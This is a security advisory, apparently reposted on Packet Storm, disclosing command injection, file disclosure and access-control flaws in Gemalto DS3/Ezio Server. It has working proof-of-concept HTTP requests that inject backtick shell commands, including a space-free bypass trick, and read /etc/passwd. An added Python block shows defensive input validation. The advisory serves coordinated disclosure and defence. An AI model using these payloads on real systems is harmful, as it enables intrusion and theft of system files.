
Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure

Posted May 9, 2019
Authored by TING Meng Yean | Site sec-consult.com

Gemalto (Thales Group) DS3 Authentication Server and Ezio Server versions prior to 3.1.0 suffer from semi-blind OS command injection, local file disclosure, and broken access controls that, when combined, allow a low-privileged application user to upload a JSP web shell with the access rights of the lower privileged Linux system user "asadmin".

tags | exploit, web, shell, local
systems | linux
advisories | CVE-2019-9156, CVE-2019-9157, CVE-2019-9158
MD5 | 946053c73c9d490355a31158aefe4e4e

SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
vulnerable version: Ezio DS3 server <v3.1.0
fixed version: Ezio DS3 server v3.1.0
CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158
impact: Medium
homepage: https://www.gemalto.com
found: 2019-02-11
by: TING Meng Yean (Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions.
DS3 has been acquired by Gemalto, and the Authentication Server is now known
as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
upgrade to the latest version available.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security
issues.


Vulnerability overview/description:
-----------------------------------
The DS3 Authentication Server is prone to several security issues, described
below, that, when combined, allow a low-privileged application user to upload a
JSP web shell with the access rights of the lower privileged Linux system
user "asadmin".

The CVSSv3 scores have been provided by the vendor.


1) Semi-Blind OS Command Injection (Post-authenticated)
- CVE-2019-9156
- CWE-78
- CVSSv3: 6.8 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated)
- CVE-2019-9157
- CWE-538
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several administration tools to check the
system's access and error logs. "TailLogs.jsp" does not correctly validate the
user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary
local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated)
- CVE-2019-9158
- CWE-284
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several permission groups, granting different
levels of privileges, from the administrative "dsssAdmin" group to the low
privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more
functions in the menu of the web portal than a user with the "READ_ONLY" group.
However, the user with the "READ_ONLY" group can access some "dsssAdmin"
functions by replaying the POST or GET request directly.


Proof of concept:
-----------------
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)

This POC was performed using a user with the "READ_ONLY" group permission.

This exploit also has the following two restrictions:
1) The injected bash commands cannot contain any space (' '/%20).
2) The output of the injected bash commands must be empty or must not contain
any space (' '/%20). However, the tester was able to build complex bash command
payloads without any space (' '/%20) by using a bash trick.

Below, the simple OS command payload "whoami" is injected into the "HOST_NAME"
parameter, and the HTTP response shows the result of the payload, "asadmin",
mixed into the output. Please note that the OS command payload is enclosed
in `` (backtick) characters.

########################################################################
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 12987

...
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">
Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 3
Attempting connection to 127.0.0.1`whoami` on port 8443
...
127.0.0.1asadmin/8443: Temporary failure in name resolution
Error connecting to 127.0.0.1`whoami` on port 8443
Successful connection to 127.0.0.1`whoami` on port 8443
</TEXTAREA>
</TD>
...
########################################################################


Below, the complex bash command payload without any space (' '/%20), representing
"ls -1 | tail -1", is injected into the "PORT_NUMBER" parameter, and the HTTP
response shows the result of the payload, "liquibase.out", mixed into the output.
Please note that the OS command payload is enclosed in `` (backtick) characters.
########################################################################
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 173

CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 13159

...
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">
Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 8
Attempting connection to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype
Error connecting to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
Successful connection to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
</TEXTAREA>
</TD>
...
########################################################################


2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)

This POC was performed using an admin user with the "dsssAdmin" group
permission, as the "ADMINISTRATION -> Log Manager -> View Log -> Tail Logs
Utility" function is not accessible to users with the "READ_ONLY" group
permission.

This exploit has the following two restrictions:
1) Only the last 10 lines of the file are displayed.
2) Directory traversal was not allowed, as the parameter cannot contain two
dot (.) characters.

However, the tester was able to bypass the directory traversal restriction by
injecting the arbitrary filename as an additional argument, rather than
modifying the first argument.

Below, the file "/etc/passwd" is injected into the "LOG_TYPE" parameter, and
the response returns the last 10 lines of that file. Please note that the
injected filename is preceded by the + character, which is decoded as a space
and so separates it from the first argument.
########################################################################
GET /ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token> HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>

########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Content-Length: 3702
Server: DS3-AuthServer

...
<TR Border=0 Align="LEFT">
<TD COLSPAN=2>
<TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS">
==> /home/data/log/ <==
==> /etc/passwd <==
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin
asadmin:x:502:502::/home/asadmin:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin
haproxy:x:503:504::/home/haproxy:/sbin/nologin
</TEXTAREA>
</TD>
...
########################################################################
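As an added example (not the advisory's or the vendor's code), the kind of allowlist validation that closes issues 1) and 2): an IP-or-hostname and numeric-port check for "TestTelnetConnection.jsp", and a fixed-set check for the "LOG_TYPE" of "TailLogs.jsp", run against inputs modelled on the requests above. The endpoint table, the set of allowed log names and the function names are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Hypothetical allowlist validation for the parameters named in issues 1) and 2).
# Illustrative code written for this page, not the DS3/Ezio Server's own code.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"   # one DNS label
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")
# Constructed allowlist of log names TailLogs.jsp may serve; the real set is unknown.
ALLOWED_LOG_TYPES = {"audit.log", "access.log", "error.log"}

def valid_host(value: str) -> bool:
    """IP literal or plain hostname: backticks, $, ; and spaces can never pass."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None

def valid_port(value: str) -> bool:
    """Only a decimal integer in 1..65535, so nothing can be appended to it."""
    return value.isdigit() and 1 <= int(value) <= 65535

def valid_log_type(value: str) -> bool:
    """Fixed set instead of a '..' filter: a space-prefixed extra path fails too."""
    return value in ALLOWED_LOG_TYPES

# endpoint -> parameter -> validator (assumed layout)
CHECKS = {
    "/ServerAdmin/TestTelnetConnection.jsp": {"HOST_NAME": valid_host, "PORT_NUMBER": valid_port},
    "/ServerAdmin/TailLogs.jsp": {"LOG_TYPE": valid_log_type},
}

def rejected_params(path: str, query_or_body: str) -> list:
    """(name, decoded value) pairs that fail the allowlist for this endpoint.
    parse_qs turns '+' into a space, which is how the LFD payload became a second argument."""
    params = parse_qs(query_or_body, keep_blank_values=True)
    return [(name, value)
            for name, check in CHECKS.get(path, {}).items()
            for value in params.get(name, [])
            if not check(value)]

if __name__ == "__main__":
    # Constructed inputs modelled on the advisory's two requests.
    print(rejected_params("/ServerAdmin/TestTelnetConnection.jsp",
                          "CSRFTOKEN=x&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443"))
    print(rejected_params("/ServerAdmin/TailLogs.jsp", "LOG_TYPE=+/etc/passwd&TAIL_LINE=0"))
```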


3) Broken Access Control (Post-authenticated) (CVE-2019-9158)

The admin user with the "dsssAdmin" group permission is able to access the
following chain of functions in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

The user with the "READ_ONLY" group permission is not able to access the
following chain of functions in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log

Based on the web portal, a user with the "READ_ONLY" group permission should
also not be able to access the following chain of functions.
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

However, it was noted that a user with the "READ_ONLY" group permission is able
to access the "Tail Logs Utility" function by replaying the GET request (captured
from the "dsssAdmin" user's session) directly with the "READ_ONLY" user's own
session cookie and CSRFTOKEN.

https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=<csrf_token>

********************************************************************************


Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
* 2.6.1-SP01

The following version was confirmed to be vulnerable by the vendor:
* All versions earlier than v3.1.0


Vendor contact timeline:
------------------------
2019-02-27: Contacting vendor through csirt@gemalto.com (Gemalto CERT)
2019-03-08: Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server
version 2.8.0-update01 and earlier. Requested 2 months disclosure
embargo period to implement fix for future release.
2019-03-22: Gemalto CERT confirmed the fix for the reported vulnerabilities to
be included in current sprint and provided CVSSv3 scoring and CWE
assigned.
2019-03-22: Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05: Gemalto CERT provided updated CVSSv3 metrics.
2019-04-18: Gemalto CERT informed that the fix for the 3 vulnerabilities
was planned for the upcoming Ezio DS3 server v3.1.0 release
in the 1st week of May, and asked for an extension of the embargo period.
Furthermore, Gemalto is now part of the Thales Group.
2019-05-06: Patches available
2019-05-09: Coordinated release of security advisory


Solution:
---------
According to the vendor the patches are provided to the Support Team L2 and
Professional Services team and those teams will get in touch with the technical
contacts of the customers. The update will also be announced via a future newsletter.

Furthermore, SEC Consult has been informed that the 2.x branch of Ezio DS3
server is not fixed yet and a patch will be available at a later date.
In the meantime, customers are reminded of the deployment guidelines that
reduce their attack surface.


Workaround:
-----------
As the vulnerabilities require authentication with valid credentials to the portal,
it is recommended to deploy the application in a trusted zone and to restrict
access to the customer's internal secure network.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF TING Meng Yean / @2019

© 2019 Packet Storm. All rights reserved.